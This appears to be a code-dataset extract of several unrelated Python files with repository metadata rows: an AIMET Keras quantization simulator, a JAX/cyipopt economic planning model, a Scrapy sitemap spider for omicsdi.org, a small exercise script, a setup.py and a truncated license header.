#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" Quantsim for Keras """
import json
import os
from typing import Union, Dict, Tuple, Optional
import tensorflow as tf
from aimet_common.defs import QuantScheme
from aimet_common.utils import AimetLogger, save_json_yaml
from aimet_common.quantsim import encoding_version
from aimet_tensorflow.keras.connectedgraph import ConnectedGraph
from aimet_tensorflow.keras.cross_layer_equalization import GraphSearchUtils
from aimet_tensorflow.keras.quant_sim.qc_quantize_wrapper import QcQuantizeWrapper, QuantizerSettings
from aimet_tensorflow.keras.quant_sim.tensor_quantizer import TensorQuantizer, ActivationTensorQuantizer, \
ParamTensorQuantizer
from aimet_tensorflow.keras.quantsim_config.quantsim_config import QuantSimConfigurator, INPUT_QUANTIZERS, \
OUTPUT_QUANTIZERS, PARAM_QUANTIZERS
_logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Quant)
unquantizable_modules = (tf.keras.layers.InputLayer, QcQuantizeWrapper)
class QuantizationSimModel:
"""
Implements mechanism to add quantization simulations ops to a model. This allows for off-target simulation of
inference accuracy. Also allows the model to be fine-tuned to counter the effects of quantization.
"""
# pylint: disable=too-many-arguments
# pylint: disable=unused-argument
def __init__(self, model, quant_scheme: Union[QuantScheme, str] = 'tf_enhanced', rounding_mode: str = 'nearest',
default_output_bw: int = 8, default_param_bw: int = 8, in_place: bool = False,
config_file: str = None):
"""
:param model: Model to quantize
:param quant_scheme: Quantization Scheme, currently supported schemes are post_training_tf and
post_training_tf_enhanced, defaults to post_training_tf_enhanced
:param rounding_mode: The round scheme to used. One of: 'nearest' or 'stochastic', defaults to 'nearest'.
:param default_output_bw: bitwidth to use for activation tensors, defaults to 8
:param default_param_bw: bitwidth to use for parameter tensors, defaults to 8
:param in_place: If True, then the given 'model' is modified in-place to add quant-sim nodes.
Only suggested use of this option is when the user wants to avoid creating a copy of the model
:param config_file: Path to a config file to use to specify rules for placing quant ops in the model
"""
self._model_without_wrappers = model
if not in_place:
self._model_without_wrappers = tf.keras.models.clone_model(model)
self._model_without_wrappers.set_weights(model.get_weights())
self._layer_name_to_quant_wrapper = {}
self._validate_model()
self._quantsim_configurator = self._initialize_quantsim_configurator(quant_scheme, rounding_mode,
default_output_bw, default_param_bw,
config_file)
self.model = self._add_quantization_wrappers(quant_scheme, rounding_mode, default_output_bw, default_param_bw)
self._disable_quantizers_in_folded_batchnorm()
def _validate_model(self):
"""
Check that model is appropriate for quantsim.
"""
multiple_inbound_node_layers = []
for layer in self._model_without_wrappers.layers:
if len(layer.inbound_nodes) > 1:
multiple_inbound_node_layers.append(layer.name)
if multiple_inbound_node_layers:
_logger.error('Layers with more than one inbound nodes are unsupported. This may occur if a layer is '
'reused multiple times in the model definition.')
_logger.error('Layers with multiple inbound nodes: {%s}', multiple_inbound_node_layers)
raise NotImplementedError
def _initialize_quantsim_configurator(self, quant_scheme: Union[QuantScheme, str], rounding_mode: str,
default_output_bw: int, default_param_bw: int,
config_file: str) -> QuantSimConfigurator:
"""
Initialize quantsim configurator
:param quant_scheme: Quantization Scheme
:param rounding_mode: The round scheme to used
:param default_output_bw: bitwidth to use for activation tensors
:param default_param_bw: bitwidth to use for parameter tensors
:param config_file: Path to a config file to use to specify rules for placing quant ops in the model
:return: QuantSimConfigurator
"""
connected_graph = ConnectedGraph(self._model_without_wrappers)
return QuantSimConfigurator(connected_graph, quant_scheme, rounding_mode,
default_output_bw, default_param_bw, config_file)
def _add_quantization_wrappers(self, quant_scheme, rounding_mode, default_output_bw, default_param_bw):
"""
Add quantization wrappers to the model and return a new model with the wrappers inserted.
:param quant_scheme: Quantization scheme to use
:param rounding_mode: Rounding mode to use
:param default_output_bw: Default bitwidth for activation quantizers
:param default_param_bw: Default bitwidth for param quantizers
"""
def wrap_layer(layer) -> tf.keras.layers.Layer:
"""
Function to wrap layers with QcQuantizeWrappers, used by keras clone_model()
:param layer: Layer to wrap
:return: Wrapped layer, or original layer if layer is not to be wrapped
"""
activation_quant_settings = QuantizerSettings(default_output_bw, rounding_mode,
quant_scheme, False, False, False)
param_quant_settings = QuantizerSettings(default_param_bw, rounding_mode,
quant_scheme, False, False, False)
if isinstance(layer, unquantizable_modules) or layer.submodules:
return layer
input_quantizers, output_quantizers, param_quantizers = self._get_quantizers_by_layer(layer)
wrapper = QcQuantizeWrapper(layer, activation_quant_settings, param_quant_settings,
num_inputs=len(layer.inbound_nodes[0].keras_inputs),
input_quantizers=input_quantizers,
output_quantizers=output_quantizers,
param_quantizers=param_quantizers)
self._layer_name_to_quant_wrapper[layer.name] = wrapper
return wrapper
return tf.keras.models.clone_model(self._model_without_wrappers, clone_function=wrap_layer)
def _get_quantizers_by_layer(self, layer: tf.keras.layers.Layer) -> Tuple[Optional[ActivationTensorQuantizer],
Optional[ActivationTensorQuantizer],
Optional[ParamTensorQuantizer]]:
"""
Get input/output/param quantizers from quantizers dictionary or initialize quantizers if layer is not found
:param layer: Target layer
:return: tuple of input, output, param quantizers
"""
quantizers_dict = self._quantsim_configurator.get_quantizers_dict(layer)
if quantizers_dict is None:
_logger.warning("%s not found in quantizers dict, will generate quantizers automatically", layer.name)
input_quantizers = None
output_quantizers = None
param_quantizers = None
else:
input_quantizers = quantizers_dict.get(INPUT_QUANTIZERS)
output_quantizers = quantizers_dict.get(OUTPUT_QUANTIZERS)
param_quantizers = quantizers_dict.get(PARAM_QUANTIZERS)
return input_quantizers, output_quantizers, param_quantizers
def _disable_quantizers_in_folded_batchnorm(self):
"""
Disable input/output/param quantizers if layer is folded batch normalization
"""
for quantsim_wrapper in self._layer_name_to_quant_wrapper.values():
if GraphSearchUtils.is_folded_batch_normalization(quantsim_wrapper.original_layer):
for q in quantsim_wrapper.input_quantizers:
q.disable()
for q in quantsim_wrapper.output_quantizers:
q.disable()
for q in quantsim_wrapper.param_quantizers:
q.disable()
@staticmethod
def _get_encoding_dict_for_quantizer(quantizer: TensorQuantizer) -> Dict[str, Union[str, int, float]]:
"""
Get encoding dict for a tensor quantizer.
:param quantizer: Quantizer to get encoding info from
:return: Dictionary containing encodings info for the tensor quantizer
"""
encoding_dict = {}
encoding_dict['min'] = quantizer.encoding.min
encoding_dict['max'] = quantizer.encoding.max
encoding_dict['scale'] = quantizer.encoding.delta
encoding_dict['offset'] = int(quantizer.encoding.offset)
encoding_dict['bitwidth'] = quantizer.encoding.bw
encoding_dict['is_symmetric'] = str(quantizer.is_symmetric)
encoding_dict['dtype'] = 'int'
return encoding_dict
def _get_encodings_dict(self) -> Dict[str, Union[str, Dict]]:
"""
Get encodings dict containing all activation and parameter encodings info in the model
:return: Dictionary containing all activation and parameter encodings info in the model
"""
# pylint: disable=protected-access
activation_encodings = {}
param_encodings = {}
for wrapper in self.quant_wrappers():
for idx, input_quantizer in enumerate(wrapper.input_quantizers):
if input_quantizer.encoding is not None:
tensor_name = wrapper._layer_to_wrap.inbound_nodes[0].keras_inputs[idx].name
encoding_dict = self._get_encoding_dict_for_quantizer(input_quantizer)
activation_encodings[tensor_name] = encoding_dict
for idx, param_quantizer in enumerate(wrapper.param_quantizers):
if param_quantizer.encoding is not None:
param_name = wrapper._layer_to_wrap.weights[idx].name
encoding_dict = self._get_encoding_dict_for_quantizer(param_quantizer)
param_encodings[param_name] = encoding_dict
for idx, output_quantizer in enumerate(wrapper.output_quantizers):
if output_quantizer.encoding is not None:
tensor_name = wrapper._layer_to_wrap.output.name
encoding_dict = self._get_encoding_dict_for_quantizer(output_quantizer)
activation_encodings[tensor_name] = encoding_dict
encodings_dict = {'version': encoding_version,
'activation_encodings': activation_encodings,
'param_encodings': param_encodings}
return encodings_dict
def compute_encodings(self, forward_pass_callback, forward_pass_callback_args):
"""
Computes encodings for all quantization sim nodes in the model.
:param forward_pass_callback: A callback function that is expected to runs forward passes on a model.
This callback function should use representative data for the forward pass, so the calculated
encodings work for all data samples.
:param forward_pass_callback_args: These argument(s) are passed to the forward_pass_callback as-is. Up to
the user to determine the type of this parameter. E.g. could be simply an integer representing the number
of data samples to use. Or could be a tuple of parameters or an object representing something more
complex.
"""
forward_pass_callback(self.model, forward_pass_callback_args)
for quant_wrapper in self.quant_wrappers():
quant_wrapper.compute_encoding()
def export(self, path, filename_prefix):
"""
This method exports out the quant-sim model so it is ready to be run on-target.
Specifically, the following are saved
1. The sim-model is exported to a regular Keras model without any simulation ops
2. The quantization encodings are exported to a separate JSON-formatted file that can
then be imported by the on-target runtime (if desired)
:param path: path where to store model pth and encodings
:param filename_prefix: Prefix to use for filenames of the model pth and encodings files
"""
model_path = os.path.join(path, filename_prefix)
self._model_without_wrappers.save(model_path)
self._model_without_wrappers.save(model_path + '.h5', save_format='h5')
encodings_dict = self._get_encodings_dict()
encoding_file_path = os.path.join(path, filename_prefix + '.encodings')
save_json_yaml(encoding_file_path, encodings_dict)
def set_and_freeze_param_encodings(self, encoding_path: str):
"""
Set and freeze parameter encodings from encodings JSON file
:param encoding_path: path from where to load parameter encodings file
"""
# Load parameter encodings file
with open(encoding_path) as json_file:
param_encodings = json.load(json_file)
for quant_wrapper in self.quant_wrappers():
quant_wrapper.set_and_freeze_param_encoding(param_encodings)
def quant_wrappers(self):
"""
Generator for yielding all quantization wrappers
"""
for layer in self.model.layers:
if isinstance(layer, QcQuantizeWrapper):
yield layer
def get_quant_wrapper_for_layer_name(self, layer_name: str) -> QcQuantizeWrapper:
"""
Return qc quant wrapper corresponding to a layer name
:param layer_name: Layer name to get quantize wrapper for
:return: Qc quant wrapper corresponding to a layer name
"""
return self._layer_name_to_quant_wrapper.get(layer_name)
| 53.305921 | 120 | 0.671953 |
ecc3e1c7532f70f8908058c959250626aa73db90 | 139 | py | Python | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | import lib
arq = "teste.txt"
if not lib.arquivo.arquivoExiste(arq):
lib.arquivo.criarArquivo(arq)
opção=lib.interface.escolha(arq)
| 13.9 | 38 | 0.741007 |
e469f8492d6c01949735281f26ffee76fe6a6927 | 18,901 | py | Python | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | from jax.config import config
config.update("jax_enable_x64", True)
#-----------global modules
import jax.numpy as np
from jax import jit, grad, jacrev, jacfwd
from jax.experimental import sparse
from cyipopt import minimize_ipopt
#-----------local modules
#import economic_functions as efcn
#==============================================================================
#-------------economic parameters
#-----------basic economic parameters
NREG = 2 # number of regions
NSEC = 2 # number of sectors
PHZN = NTIM = LFWD = 2# look-forward parameter / planning horizon (Delta_s)
NPOL = 3 # number of policy types: con, lab, knx, #itm
NITR = LPTH = 2# path length (Tstar): number of random steps along given path
NPTH = 1 # number of paths (in basic example Tstar + 1)
BETA = 95e-2 # discount factor
ZETA0 = 1 # output multiplier in status quo state 0
ZETA1 = 95e-2 # output multiplier in tipped state 1
PHIA = 5e-1 # adjustment cost multiplier
PHIK = 33e-2 # weight of capital in production # alpha in CJ
TPT = 1e-2 # transition probability of tipping (from state 0 to 1)
GAMMA = 5e-1 # power utility exponent
DELTA = 25e-3 # depreciation rate
ETA = 5e-1 # Frisch elasticity of labour supply
RHO = np.ones(NREG) # regional weights (population)
TCS=75e-2 # Tail Consumption Share
#-----------suppressed basic parameters
#PHIM = 5e-1 # weight of intermediate inputs in production
#XI = np.ones(NRxS) * 1 / NRxS # importance of kapital input to another
#MU = np.ones(NRxS) * 1 / NRxS # importance of one sector to another
#-----------derived economic parameters
NRxS = NREG * NSEC
GAMMAhat = 1 - 1 / GAMMA # utility parameter (consumption denominator)
ETAhat = 1 + 1 / ETA # utility parameter
PHIL = 1 - PHIK # labour's importance in production
DPT = (1 - (1 - DELTA) * BETA) / (PHIK * BETA) # deterministic prod trend
RWU = (1 - PHIK) * DPT * (DPT - DELTA) ** (-1 / GAMMA) # Rel Weight in Utility
ZETA = np.array([ZETA0, ZETA1])
NVAR = NPOL * LFWD * NSEC * NREG # total number of variables
X0 = np.ones(NVAR) # our initial warm start
# k0(j) = exp(log(kmin) + (log(kmax)-log(kmin))*(ord(j)-1)/(card(j)-1));
KAP0 = np.ones(NREG) # how about NSEC ????
#for j in range(n_agt):
# KAP0[j] = np.exp(
# np.log(kap_L) + (np.log(kap_U) - np.log(kap_L)) * j / (n_agt - 1)
# )
#-----------suppressed derived economic parameters
#IVAR = np.arange(0,NVAR) # index set (as np.array) for all variables
#==============================================================================
#-----------structure of x using latex notation:
#---x = [
# x_{p0, t0, r0, s0}, x_{p0, t0, r0, s1}, x_{p0, t0, r0, s2},
#
# x_{p0, t0, r1, s0}, x_{p0, t0, r1, s1}, x_{p0, t0, r1, s2},
#
# x_{p0, t1, r0, s0}, x_{p0, t1, r0, s1}, x_{p0, t1, r0, s2},
#
# x_{p0, t1, r1, s0}, x_{p0, t1, r1, s1}, x_{p0, t1, r1, s2},
#
# x_{p1, t0, r0, s0}, x_{p1, t0, r0, s1}, x_{p0, t0, r0, s2},
#
# x_{p1, t0, r1, s0}, x_{p1, t0, r1, s1}, x_{p0, t0, r1, s2},
#
# x_{p1, t1, r0, s0}, x_{p1, t1, r0, s1}, x_{p0, t1, r0, s2},
#
# x_{p1, t1, r1, s0}, x_{p1, t1, r1, s1}, x_{p0, t1, r1, s2},
#
#
# x_{p2, t0, r0, s00}, x_{p2, t0, r0, s01}, x_{p2, t0, r0, s02},
# x_{p2, t0, r0, s10}, x_{p2, t0, r0, s11}, x_{p2, t0, r0, s12},
# x_{p2, t0, r0, s20}, x_{p2, t0, r0, s21}, x_{p2, t0, r0, s22},
#
# x_{p2, t0, r1, s00}, x_{p2, t0, r1, s01}, x_{p2, t0, r1, s02},
# x_{p2, t0, r1, s10}, x_{p2, t0, r1, s11}, x_{p2, t0, r1, s12},
# x_{p2, t0, r1, s20}, x_{p2, t0, r1, s21}, x_{p2, t0, r1, s22},
#
# x_{p2, t1, r0, s00}, x_{p2, t1, r0, s01}, x_{p2, t1, r0, s02},
# x_{p2, t1, r0, s10}, x_{p2, t1, r0, s11}, x_{p2, t1, r0, s12},
# x_{p2, t1, r0, s20}, x_{p2, t1, r0, s21}, x_{p2, t1, r0, s22},
#
# x_{p2, t1, r1, s00}, x_{p2, t1, r1, s01}, x_{p2, t1, r1, s02},
# x_{p2, t1, r1, s10}, x_{p2, t1, r1, s11}, x_{p2, t1, r1, s12},
# x_{p2, t1, r1, s20}, x_{p2, t1, r1, s21}, x_{p2, t1, r1, s22},
#
#
# x_{p3, t0, r0, s00}, x_{p3, t0, r0, s01}, x_{p3, t0, r0, s02},
# x_{p3, t0, r0, s10}, x_{p3, t0, r0, s11}, x_{p3, t0, r0, s12},
# x_{p3, t0, r0, s20}, x_{p3, t0, r0, s21}, x_{p3, t0, r0, s22},
#
# x_{p3, t0, r1, s00}, x_{p3, t0, r1, s01}, x_{p3, t0, r1, s02},
# x_{p3, t0, r1, s10}, x_{p3, t0, r1, s11}, x_{p3, t0, r1, s12},
# x_{p3, t0, r1, s20}, x_{p3, t0, r1, s21}, x_{p3, t0, r1, s22},
#
# x_{p3, t1, r0, s00}, x_{p3, t1, r0, s01}, x_{p3, t1, r0, s02},
# x_{p3, t1, r0, s10}, x_{p3, t1, r0, s11}, x_{p3, t1, r0, s12},
# x_{p3, t1, r0, s20}, x_{p3, t1, r0, s21}, x_{p3, t1, r0, s22},
#
# x_{p3, t1, r1, s00}, x_{p3, t1, r1, s01}, x_{p3, t1, r1, s02},
# x_{p3, t1, r1, s10}, x_{p3, t1, r1, s11}, x_{p3, t1, r1, s12},
# x_{p3, t1, r1, s20}, x_{p3, t1, r1, s21}, x_{p3, t1, r1, s22},
# ]
#
#==============================================================================
#---------------dicts
#-----------dimensions for each pol var: 0 : scalar; 1 : vector; 2 : matrix
d_dim = {
"con": 1,
"knx": 1,
"lab": 1,
}
i_pol = {
"con": 0,
"knx": 1,
"lab": 2,
}
i_reg = {
"aus": 0,
"qld": 1,
"wld": 2,
}
i_sec = {
"agr": 0,
"for": 1,
#"min": 2,
#"man": 3,
#"uty": 4,
#"ctr": 5,
#"com": 6,
#"tps": 7,
#"res": 8,
}
# Warm start
pol_S = {
"con": 4,
"lab": 1,
"knx": KAP0,
#"sav": 2,
#"out": 6,
# "itm": 10,
# "ITM": 10,
# "SAV": 10,
#"utl": 1,
# "val": -300,
}
#-----------dicts of index lists for locating variables in x:
#-------Dict for locating every variable for a given policy
d_pol_ind_x = dict()
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NTIM * NREG * NSEC ** d
start = p * stride
end = start + stride
d_pol_ind_x[pk] = range(NVAR)[start : end : 1]
#-------Dict for locating every variable at a given time
d_tim_ind_x = dict()
for t in range(NTIM):
indlist = []
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NREG * NSEC ** d
start = (p * NTIM + t) * stride
end = start + stride
indlist.extend(range(NVAR)[start : end : 1])
d_tim_ind_x[t] = sorted(indlist)
#-----------the final one can be done with a slicer with stride NSEC ** d_dim
#-------Dict for locating every variable in a given region
d_reg_ind_x = dict()
for rk in i_reg.keys():
r = i_reg[rk]
indlist = []
for t in range(NTIM):
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NSEC ** d
start = (p * NTIM * NREG + t * NREG + r) * stride
end = start + stride
indlist += range(NVAR)[start : end : 1]
d_reg_ind_x[rk] = sorted(indlist)
#-------Dict for locating every variable in a given sector
d_sec_ind_x = dict()
for sk in i_sec.keys(): #comment
s = i_sec[sk]
indlist = []
for rk in i_reg.keys():
r = i_reg[rk]
for t in range(NTIM):
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = 1
start = (p * NTIM * NREG + t * NREG + r) * NSEC ** d + s
end = start + stride
indlist += range(NVAR)[start : end : 1]
d_sec_ind_x[s] = sorted(indlist)
#-----------union of all the "in_x" dicts: those relating to indices of x
d_ind_x = d_pol_ind_x | d_tim_ind_x | d_reg_ind_x | d_sec_ind_x
#==============================================================================
#-----------function for returning index subsets of x for a pair of dict keys
def sub_ind_x(key1, # any key of d_ind_x
key2, # any key of d_ind_x
d=d_ind_x, # dict of index categories: pol, time, sec, reg
):
val = np.array(list(set(d[key1]) & set(d[key2])))
return val
j_sub_ind_x = jit(sub_ind_x)
# possible alternative: ind(ind(ind(range(len(X0)), key1),key2), key3)
#-----------function for intersecting two lists: returns indices as np.array
#def f_I2L(list1,list2):
# return np.array(list(set(list1) & set(list2)))
#==============================================================================
#---------------economic_functions
#------------------------------------------------------------------------------
#-----------instantaneous utility as a pure function
#-----------requires: "import economic_parameters as par"
def instant_utility(con, # consumption vec of vars at given time
lab, # labour vec of vars at given time
B=RWU, # relative weight of con and lab in util
rho=RHO, # regional-weights vec at given time
gh=GAMMAhat,
eh=ETAhat,
):
#-------log utility
#val = np.sum(rho * (np.log(con) - B * np.log(lab)))
#-------general power utility:
val = np.sum(rho * (2 * con ** gh / gh - B * lab ** eh / eh))
return val
j_instant_utility = jit(instant_utility)
#==============================================================================
#-----------v-tail as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def V_tail(kap, # kapital vec of vars at time t=LFWD
A=DPT, # deterministic productivity trend
beta=BETA, # discount factor
phik=PHIK, # weight of capital in production
tcs=TCS, # tail consumption share
u=instant_utility, # utility function
):
#-------tail consumption vec
tail_con = tcs * A * kap ** phik
#-------tail labour vec normalised to one
tail_lab = np.ones(len(kap))
val = u(tail_con, tail_lab) / (1 - beta)
return val
j_V_tail = jit(V_tail)
#==============================================================================
#-----------probabity of no tip by time t as a pure function
#-----------requires: "import economic_parameters as par"
def prob_no_tip(tim, # time step along a path
tpt=TPT, # transition probability of tipping
):
return (1 - tpt) ** tim
j_prob_no_tip = jit(prob_no_tip)
#==============================================================================
#-----------expected output as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def expected_output(kap, # kap vector of vars
lab, # lab vector of vars
tim, # time step along a path
A=DPT, # determistic prod trend
phik=PHIK, # weight of kap in prod
phil=PHIL, # weight of lab in prod
zeta=ZETA, # shock-value vector
pnot=prob_no_tip, # prob no tip by t
):
y = A * (kap ** phik) * (lab ** phil) # output
E_zeta = zeta[1] + pnot(tim) * (zeta[0] - zeta[1]) # expected shock
val = E_zeta * y
return val
j_expected_output = jit(expected_output)
#==============================================================================
#-----------adjustment costs of investment as a pure function
#-----------requires: "import economic_parameters as par"
def adjustment_cost(kap,
knx,
phia=PHIA, # adjustment cost multiplier
):
# since sav/kap - delta = (knx - (1 - delta) * kap)/kap - delta = ..
# we can therefore rewrite the adjustment cost as
val = phia * kap * np.square(knx / kap - 1)
return 0
j_adjustment_cost = jit(adjustment_cost)
#==============================================================================
#-----------market clearing/budget constraint as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def market_clearing(kap,
knx,
con,
lab,
tim,
delta=DELTA,
adjc=adjustment_cost, # Gamma in Cai-Judd
E_f=expected_output,
):
sav = knx - (1 - delta) * kap
val = sum(E_f(kap, lab, tim) - con - sav - adjc(kap, sav))
return val
j_market_clearing = jit(market_clearing)
#==============================================================================
#-----------objective function (purified)
def objective(x, # full vector of variables
beta=BETA, # discount factor
lfwd=LFWD, # look-forward parameter
ind=sub_ind_x, # subindices function for x: req. two keys
u=j_instant_utility,# utility function representing flow per t
v=V_tail, # tail-sum value function
):
# extract/locate knx at the planning horizon in x
kap_tail = x[ind("knx", lfwd - 1)]
# sum discounted utility over the planning horizon
sum_disc_utl = 0.0
for t in range(lfwd):
CON = x[ind("con", t)] # locate consumption at t in x
LAB = x[ind("lab", t)] # locate labour at t in x
sum_disc_utl += beta ** t * u(con=CON, lab=LAB)
val = sum_disc_utl + beta ** lfwd * v(kap=kap_tail)
return val
j_objective = jit(objective)
#==============================================================================
#-----------equality constraints
def eq_constraints(x,
state,
lfwd=LFWD,
ind=sub_ind_x,
mcl=j_market_clearing,
):
eqns = np.zeros(lfwd)
for t in range(lfwd):
if t == 0:
KAP = state
else:
KAP = x[ind("knx", t-1)]
KNX = x[ind("knx", t)]
CON = x[ind("con", t)]
LAB = x[ind("lab", t)]
eqns = eqns.at[t].set(mcl(kap=KAP, knx=KNX, con=CON, lab=LAB, tim=t))
return eqns
#==============================================================================
#-------------build and jit (just-in-time compile) the derivatives
#-----------first the objective
obj = jit(objective) # obj with one arg
obj_grad = jit(grad(obj)) # grad
obj_hess = jit(jacrev(jacfwd(obj))) # hessian
#-----------then the equality constraints
eq_ctt = jit(lambda x, state: eq_constraints(x, state)) # eq_ctt two-args
eq_ctt_jac = jit(jacfwd(eq_ctt)) # jacobian
eq_ctt_hess = jit(jacrev(jacfwd(eq_ctt))) # hessian
#-----------then the inequality constraints
#con_ineq = jit(ineq_constraints) # ineq_ctt two-args
#ineq_ctt_jac = jit(jacfwd(ineq_ctt)) # jacobian
#ineq_ctt_hess = jacrev(jacfwd(ineq_ctt)) # hessian
#ineq_ctt_hessvp = jit(lambda x, v: ineq_ctt_hess(x) * v[0])# hessian vec-prod
#==============================================================================
#-----------define the jitted-state-in functions for the loop
def eq_ctt_js(state):
return lambda x: eq_ctt(x, state)
def eq_ctt_jac_js(state):
return lambda x: eq_ctt_jac(x, state)
def eq_ctt_hess_js(state):
return lambda x: eq_ctt_hess(x, state)
#==============================================================================
#-----------variable bounds:
bnds = [(1e-3, 1e+3) for _ in range(NVAR)]
#==============================================================================
# Hessian vector product function
#def hvp(f, x, v):
# return np.jvp(grad(f), primals, tangents)[1]
#def eq_ctt_hvp(x, v):
# return hvp("constraints function", x, v)
#==============================================================================
#-*-*-*-*-*-loop/iteration along path starts here
#------------------------------------------------------------------------------
res = dict()
for s in range(LPTH):
#-------set initial capital for each plan
if s == 0:
KAP = KAP0
x0 = X0
else:
X = np.array(res[s - 1]["x"])
KAP = X[sub_ind_x("knx", 0)]
x0 = X
#-------feed in kapital from starting point s-1
eq_ctt_fin = jit(eq_ctt_js(state=KAP))
eq_ctt_jac_fin = jit(eq_ctt_jac_js(state=KAP))
eq_ctt_hess_fin = jit(eq_ctt_hess_js(state=KAP))
#-------this returns a hessian for each constraint if v[0] != 0
eq_ctt_hessvp = jit(lambda x, v: eq_ctt_hess_fin(x) * v[0]) # hessian vec-prod
#-------wrap up constraints for cyipopt
cons = [{'type': 'eq',
'fun': eq_ctt_fin,
'jac': eq_ctt_jac_fin,
'hess': eq_ctt_hessvp,
}]
#-------starting point (absent warm start)
#x0 = X0
#-----------execute solver
res[s] = minimize_ipopt(obj,
jac=obj_grad,
hess=obj_hess,
x0=x0,
bounds=bnds,
constraints=cons,
#nele_jac=30,
options={'disp': 12, # printout range:0-12, default=5
'obj_scaling_factor': -1.0, # maximize obj
'timing_statistics': 'yes',
'print_timing_statistics': 'yes',
'constr_viol_tol': 5e-2,
'max_iter': 1000,
'acceptable_tol': 1e-4,
#'dual_inf_tol': 0.5,
#!!how to warm start? see ipopt options page!!
#'warm_start_init_point': 'yes',
#!!next one for "multiple problems in one nlp"!!
#'warm_start_same_structure': 'yes',
}
)
x_sol = np.array(res[s]["x"])
for pk in d_pol_ind_x.keys():
print("the solution for", pk, "at step", s, "along path 0 is \n", \
x_sol[np.array(d_pol_ind_x[pk])])
#-*-*-*-*-*-loop ends here
#==============================================================================
# ----------- print solution, etc.
#for s in range(len(res)):
# print("the solution for iterate ", s, "is ", res[s])
# x_sol[s] = res[s]["x"]
# print("sol=", x_sol[s])
# for i in range(len(x_sol[s])-1):
# print("diff=", x_sol[s][i] - x_sol[s][i+1])
| 41.178649 | 85 | 0.475848 |
b939c65a3a37eeb72908f71023f4a5aba1fdae55 | 436 | py | Python | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from scrapy.spiders import SitemapSpider
from ..helper import JsonLdMixin
class OmicsdiSpider(SitemapSpider, JsonLdMixin):
name = 'omicsdi'
sitemap_urls = ['http://www.omicsdi.org/sitemap.xml']
sitemap_rules = [('/dataset/', 'extract_jsonld')]
def extract_jsonld(self, response):
for jsld in super().extract_jsonld(response, response.url):
yield jsld.get('mainEntity')
| 24.222222 | 67 | 0.681193 |
b4d8e8a4612873c1e2cc684daa4a3da24a5842a4 | 929 | py | Python | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | 3 | 2016-12-13T09:52:57.000Z | 2022-02-17T20:00:56.000Z | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | null | null | null | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | 1 | 2017-12-27T09:48:36.000Z | 2017-12-27T09:48:36.000Z | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='Serializer',
version='0.2.1',
description=(
'Easy object serialization. '
'Mimics RoR ActiveRecord serializer.'
),
long_description=__doc__,
author='Konsta Vesterinen',
author_email='konsta.vesterinen@gmail.com',
url='http://github.com/kvesteri/serializer',
packages=['serializer'],
include_package_data=True,
license='BSD',
zip_safe=False,
platforms='any',
install_requires=[
'setuptools',
'simplejson'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 25.805556 | 70 | 0.625404 |
352c4e9149a636814fd4a346f34ccd5437e76805 | 32,800 | py | Python | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | # -*- coding: utf-8 -*-
# Copyright 2017-2019 ControlScan, Inc.
#
# This file is part of Cyphon Engine.
#
# Cyphon Engine is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Cyphon Engine is distributed in the hope that it will be useful,
